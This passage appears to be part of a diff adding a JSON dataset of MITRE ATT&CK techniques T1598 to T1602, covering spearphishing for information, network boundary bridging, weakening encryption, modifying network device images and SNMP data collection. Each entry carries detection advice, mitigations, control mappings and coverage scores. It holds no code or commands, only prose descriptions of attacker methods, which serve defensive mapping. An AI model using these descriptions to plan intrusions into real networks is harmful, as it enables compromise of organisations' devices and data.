involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.", + "url": "https://attack.mitre.org/techniques/T1598", + "tactics": [ + "Reconnaissance" + ], + "detection": "Depending on the specific method of phishing, the detections can vary. Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)\n\nWhen it comes to following links, monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites.\n\nMonitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts).", + "platforms": [ + "PRE" + ], + "data_sources": [ + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1598.001", + "name": "Phishing for Information: Spearphishing Service", + "url": "https://attack.mitre.org/techniques/T1598/001", + "description": "Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services.(Citation: ThreatPost Social Media Phishing) These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries may create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and information about their environment. Adversaries may also use information from previous reconnaissance efforts (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.", + "detection": "Monitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts).\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ] + }, + { + "tid": "T1598.002", + "name": "Phishing for Information: Spearphishing Attachment", + "url": "https://attack.mitre.org/techniques/T1598/002", + "description": "Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon the recipient populating information then returning the file.(Citation: Sophos Attachment)(Citation: GitHub Phishery) The text of the spearphishing email usually tries to give a plausible reason why the file should be filled-in, such as a request for information from a business associate. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.", + "detection": "Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)", + "mitigations": [ + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ] + }, + { + "tid": "T1598.003", + "name": "Phishing for Information: Spearphishing Link", + "url": "https://attack.mitre.org/techniques/T1598/003", + "description": "Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. From the fake website, information is gathered in web forms and sent to the attacker. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.", + "detection": "Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)\n\nMonitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites.", + "mitigations": [ + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ], + "cumulative_score": 0.25593333333333335, + "adjusted_score": 0.25593333333333335, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [ + "14.1,14.2,14.6" + ], + "nist_controls": [ + "AC-4", + "CA-7", + "CM-2", + "CM-6", + "IA-9", + "SC-20", + "SC-44", + "SC-7", + "SI-3", + "SI-4", + "SI-8" + ], + "process_coverage": false, + "network_coverage": true, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1599", + "name": "Network Boundary Bridging", + "description": "Adversaries may bridge network boundaries by compromising perimeter network devices. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.\n\nDevices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.\n\nWhen an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.", + "url": "https://attack.mitre.org/techniques/T1599", + "tactics": [ + "Defense Evasion" + ], + "detection": "Consider monitoring network traffic on both interfaces of border network devices with out-of-band packet capture or network flow data, using a different device than the one in question. Look for traffic that should be prohibited by the intended network traffic policy enforcement for the border network device.\n\nMonitor the border network device’s configuration to validate that the policy enforcement sections are what was intended. Look for rules that are less restrictive, or that allow specific traffic types that were not previously authorized.", + "platforms": [ + "Network" + ], + "data_sources": [ + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1599.001", + "name": "Network Boundary Bridging: Network Address Translation Traversal", + "url": "https://attack.mitre.org/techniques/T1599/001", + "description": "Adversaries may bridge network boundaries by modifying a network device’s Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.\n\nNetwork devices such as routers and firewalls that connect multiple networks together may implement NAT during the process of passing packets between networks. When performing NAT, the network device will rewrite the source and/or destination addresses of the IP address header. Some network designs require NAT for the packets to cross the border device. A typical example of this is environments where internal networks make use of non-Internet routable addresses.(Citation: RFC1918)\n\nWhen an adversary gains control of a network boundary device, they can either leverage existing NAT configurations to send traffic between two separated networks, or they can implement NAT configurations of their own design. In the case of network designs that require NAT to function, this enables the adversary to overcome inherent routing limitations that would normally prevent them from accessing protected systems behind the border device. In the case of network designs that do not require NAT, address translation can be used by adversaries to obscure their activities, as changing the addresses of packets that traverse a network boundary device can make monitoring data transmissions more challenging for defenders. \n\nAdversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to change the operating system of a network device, implementing their own custom NAT mechanisms to further obscure their activities", + "detection": "Consider monitoring network traffic on both interfaces of border network devices. Compare packets transmitted by the device between networks to look for signs of NAT being implemented. Packets which have their IP addresses changed should still have the same size and contents in the data encapsulated beyond Layer 3. In some cases, Port Address Translation (PAT) may also be used by an adversary.\n\nMonitor the border network device’s configuration to determine if any unintended NAT rules have been added without authorization.", + "mitigations": [ + { + "mid": "M1043", + "name": "Credential Access Protection", + "description": "Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.", + "url": "https://attack.mitre.org/mitigations/M1043" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1043", + "name": "Credential Access Protection", + "description": "Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.", + "url": "https://attack.mitre.org/mitigations/M1043" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ], + "cumulative_score": 0.4250047619047619, + "adjusted_score": 0.4250047619047619, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [ + "4.1,4.2,4.4,4.7,5.2,5.3,5.4,6.1,6.2,6.4,6.5,6.8,12.2,13.4" + ], + "nist_controls": [ + "AC-2", + "AC-3", + "AC-4", + "AC-5", + "AC-6", + "CA-7", + "CM-2", + "CM-5", + "CM-6", + "CM-7", + "IA-2", + "IA-5", + "SC-28", + "SC-7", + "SI-10", + "SI-15", + "SI-4", + "SI-7" + ], + "process_coverage": false, + "network_coverage": true, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1600", + "name": "Weaken Encryption", + "description": "Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)\n\nEncryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key.\n\nAdversaries can compromise and manipulate devices that perform encryption of network traffic. For example, through behaviors such as [Modify System Image](https://attack.mitre.org/techniques/T1601), [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001), and [Disable Crypto Hardware](https://attack.mitre.org/techniques/T1600/002), an adversary can negatively effect and/or eliminate a device’s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts. (Citation: Cisco Blog Legacy Device Attacks)", + "url": "https://attack.mitre.org/techniques/T1600", + "tactics": [ + "Defense Evasion" + ], + "detection": "There is no documented method for defenders to directly identify behaviors that weaken encryption. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601). Some detection methods require vendor support to aid in investigation.", + "platforms": [ + "Network" + ], + "data_sources": [ + "File: File Modification" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1600.001", + "name": "Weaken Encryption: Reduce Key Space", + "url": "https://attack.mitre.org/techniques/T1600/001", + "description": "Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)\n\nAdversaries can weaken the encryption software on a compromised network device by reducing the key size used by the software to convert plaintext to ciphertext (e.g., from hundreds or thousands of bytes to just a couple of bytes). As a result, adversaries dramatically reduce the amount of effort needed to decrypt the protected information without the key.\n\nAdversaries may modify the key size used and other encryption parameters using specialized commands in a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) introduced to the system through [Modify System Image](https://attack.mitre.org/techniques/T1601) to change the configuration of the device. (Citation: Cisco Blog Legacy Device Attacks)", + "detection": "There is no documented method for defenders to directly identify behaviors that reduce encryption key space. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601) and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008). Some detection methods require vendor support to aid in investigation.", + "mitigations": [] + }, + { + "tid": "T1600.002", + "name": "Weaken Encryption: Disable Crypto Hardware", + "url": "https://attack.mitre.org/techniques/T1600/002", + "description": "Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.\n\nMany network devices such as routers, switches, and firewalls, perform encryption on network traffic to secure transmission across networks. Often, these devices are equipped with special, dedicated encryption hardware to greatly increase the speed of the encryption process as well as to prevent malicious tampering. When an adversary takes control of such a device, they may disable the dedicated hardware, for example, through use of [Modify System Image](https://attack.mitre.org/techniques/T1601), forcing the use of software to perform encryption on general processors. This is typically used in conjunction with attacks to weaken the strength of the cipher in software (e.g., [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001)). (Citation: Cisco Blog Legacy Device Attacks)", + "detection": "There is no documented method for defenders to directly identify behaviors that disable cryptographic hardware. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601) and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008). Some detection methods require vendor support to aid in investigation.", + "mitigations": [] + } + ], + "mitigations": [], + "cumulative_score": 0.0599, + "adjusted_score": 0.0599, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [], + "nist_controls": [], + "process_coverage": false, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1601", + "name": "Modify System Image", + "description": "Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.\n\nTo change the operating system, the adversary typically only needs to affect this one file, replacing or modifying it. This can either be done live in memory during system runtime for immediate effect, or in storage to implement the change on the next boot of the network device.", + "url": "https://attack.mitre.org/techniques/T1601", + "tactics": [ + "Defense Evasion" + ], + "detection": "Most embedded network devices provide a command to print the version of the currently running operating system. Use this command to query the operating system for its version number and compare it to what is expected for the device in question. Because this method may be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001), it may be appropriate to also verify the integrity of the vendor provided operating system image file. \n\nCompare the checksum of the operating system file with the checksum of a known good copy from a trusted source. Some embedded network device platforms may have the capability to calculate the checksum of the file, while others may not. Even for those platforms that have the capability, it is recommended to download a copy of the file to a trusted computer to calculate the checksum with software that is not compromised. (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)\n\nMany vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory. If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system. (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)", + "platforms": [ + "Network" + ], + "data_sources": [ + "File: File Modification" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1601.001", + "name": "Modify System Image: Patch System Image", + "url": "https://attack.mitre.org/techniques/T1601/001", + "description": "Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses.(Citation: Killing the myth of Cisco IOS rootkits) (Citation: Killing IOS diversity myth) (Citation: Cisco IOS Shellcode) (Citation: Cisco IOS Forensics Developments) (Citation: Juniper Netscreen of the Dead) Some network devices are built with a monolithic architecture, where the entire operating system and most of the functionality of the device is contained within a single file. Adversaries may change this file in storage, to be loaded in a future boot, or in memory during runtime.\n\nTo change the operating system in storage, the adversary will typically use the standard procedures available to device operators. This may involve downloading a new file via typical protocols used on network devices, such as TFTP, FTP, SCP, or a console connection. The original file may be overwritten, or a new file may be written alongside of it and the device reconfigured to boot to the compromised image.\n\nTo change the operating system in memory, the adversary typically can use one of two methods. In the first, the adversary would make use of native debug commands in the original, unaltered running operating system that allow them to directly modify the relevant memory addresses containing the running operating system. This method typically requires administrative level access to the device.\n\nIn the second method for changing the operating system in memory, the adversary would make use of the boot loader. The boot loader is the first piece of software that loads when the device starts that, in turn, will launch the operating system. Adversaries may use malicious code previously implanted in the boot loader, such as through the [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) method, to directly manipulate running operating system code in memory. This malicious code in the bootloader provides the capability of direct memory manipulation to the adversary, allowing them to patch the live operating system during runtime.\n\nBy modifying the instructions stored in the system image file, adversaries may either weaken existing defenses or provision new capabilities that the device did not have before. Examples of existing defenses that can be impeded include encryption, via [Weaken Encryption](https://attack.mitre.org/techniques/T1600), authentication, via [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004), and perimeter defenses, via [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599). Adding new capabilities for the adversary’s purpose include [Keylogging](https://attack.mitre.org/techniques/T1056/001), [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003), and [Port Knocking](https://attack.mitre.org/techniques/T1205/001).\n\nAdversaries may also compromise existing commands in the operating system to produce false output to mislead defenders. When this method is used in conjunction with [Downgrade System Image](https://attack.mitre.org/techniques/T1601/002), one example of a compromised system command may include changing the output of the command that shows the version of the currently running operating system. By patching the operating system, the adversary can change this command to instead display the original, higher revision number that they replaced through the system downgrade. \n\nWhen the operating system is patched in storage, this can be achieved in either the resident storage (typically a form of flash memory, which is non-volatile) or via [TFTP Boot](https://attack.mitre.org/techniques/T1542/005). \n\nWhen the technique is performed on the running operating system in memory and not on the stored copy, this technique will not survive across reboots. However, live memory modification of the operating system can be combined with [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) to achieve persistence. ", + "detection": "Compare the checksum of the operating system file with the checksum of a known good copy from a trusted source. Some embedded network device platforms may have the capability to calculate the checksum of the file, while others may not. Even for those platforms that have the capability, it is recommended to download a copy of the file to a trusted computer to calculate the checksum with software that is not compromised.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)\n\nMany vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory. If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system. (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)", + "mitigations": [ + { + "mid": "M1046", + "name": "Boot Integrity", + "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.", + "url": "https://attack.mitre.org/mitigations/M1046" + }, + { + "mid": "M1045", + "name": "Code Signing", + "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.", + "url": "https://attack.mitre.org/mitigations/M1045" + }, + { + "mid": "M1043", + "name": "Credential Access Protection", + "description": "Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.", + "url": "https://attack.mitre.org/mitigations/M1043" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + }, + { + "tid": "T1601.002", + "name": "Modify System Image: Downgrade System Image", + "url": "https://attack.mitre.org/techniques/T1601/002", + "description": "Adversaries may install an older version of the operating system of a network device to weaken security. Older operating system versions on network devices often have weaker encryption ciphers and, in general, fewer/less updated defensive features. (Citation: Cisco Synful Knock Evolution)\n\nOn embedded devices, downgrading the version typically only requires replacing the operating system file in storage. With most embedded devices, this can be achieved by downloading a copy of the desired version of the operating system file and reconfiguring the device to boot from that file on next system restart. The adversary could then restart the device to implement the change immediately or they could wait until the next time the system restarts.\n\nDowngrading the system image to an older versions may allow an adversary to evade defenses by enabling behaviors such as [Weaken Encryption](https://attack.mitre.org/techniques/T1600). Downgrading of a system image can be done on its own, or it can be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001). ", + "detection": "Many embedded network devices provide a command to print the version of the currently running operating system. Use this command to query the operating system for its version number and compare it to what is expected for the device in question. Because image downgrade may be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001), it may be appropriate to also verify the integrity of the vendor provided operating system image file. ", + "mitigations": [ + { + "mid": "M1046", + "name": "Boot Integrity", + "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.", + "url": "https://attack.mitre.org/mitigations/M1046" + }, + { + "mid": "M1045", + "name": "Code Signing", + "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.", + "url": "https://attack.mitre.org/mitigations/M1045" + }, + { + "mid": "M1043", + "name": "Credential Access Protection", + "description": "Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.", + "url": "https://attack.mitre.org/mitigations/M1043" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1046", + "name": "Boot Integrity", + "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.", + "url": "https://attack.mitre.org/mitigations/M1046" + }, + { + "mid": "M1045", + "name": "Code Signing", + "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.", + "url": "https://attack.mitre.org/mitigations/M1045" + }, + { + "mid": "M1043", + "name": "Credential Access Protection", + "description": "Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.", + "url": "https://attack.mitre.org/mitigations/M1043" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ], + "cumulative_score": 0.5533619047619047, + "adjusted_score": 0.5533619047619047, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [], + "nist_controls": [ + "AC-2", + "AC-3", + "AC-4", + "AC-5", + "AC-6", + "CA-8", + "CM-2", + "CM-3", + "CM-5", + "CM-6", + "CM-7", + "CM-8", + "IA-2", + "IA-5", + "IA-7", + "RA-9", + "SA-10", + "SA-11", + "SC-34", + "SI-2", + "SI-4", + "SI-7", + "SR-11", + "SR-4", + "SR-5", + "SR-6" + ], + "process_coverage": false, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1602", + "name": "Data from Configuration Repository", + "description": "Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.\n\nAdversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)", + "url": "https://attack.mitre.org/techniques/T1602", + "tactics": [ + "Collection" + ], + "detection": "Identify network traffic sent or received by untrusted hosts or networks that solicits and obtains the configuration information of the queried device.(Citation: Cisco Advisory SNMP v3 Authentication Vulnerabilities)", + "platforms": [ + "Network" + ], + "data_sources": [ + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Content" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1602.001", + "name": "Data from Configuration Repository: SNMP (MIB Dump)", + "url": "https://attack.mitre.org/techniques/T1602/001", + "description": "Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP).\n\nThe MIB is a configuration repository that stores variable information accessible via SNMP in the form of object identifiers (OID). Each OID identifies a variable that can be read or set and permits active management tasks, such as configuration changes, through remote modification of these variables. SNMP can give administrators great insight in their systems, such as, system information, description of hardware, physical location, and software packages(Citation: SANS Information Security Reading Room Securing SNMP Securing SNMP). The MIB may also contain device operational information, including running configuration, routing table, and interface details.\n\nAdversaries may use SNMP queries to collect MIB content directly from SNMP-managed devices in order to collect network information that allows the adversary to build network maps and facilitate future targeted exploitation.(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) ", + "detection": "Identify network traffic sent or received by untrusted hosts or networks that expose MIB content or use unauthorized protocols.(Citation: Cisco Advisory SNMP v3 Authentication Vulnerabilities)", + "mitigations": [ + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + } + ] + }, + { + "tid": "T1602.002", + "name": "Data from Configuration Repository: Network Device Configuration Dump", + "url": "https://attack.mitre.org/techniques/T1602/002", + "description": "Adversaries may access network configuration files to collect sensitive data 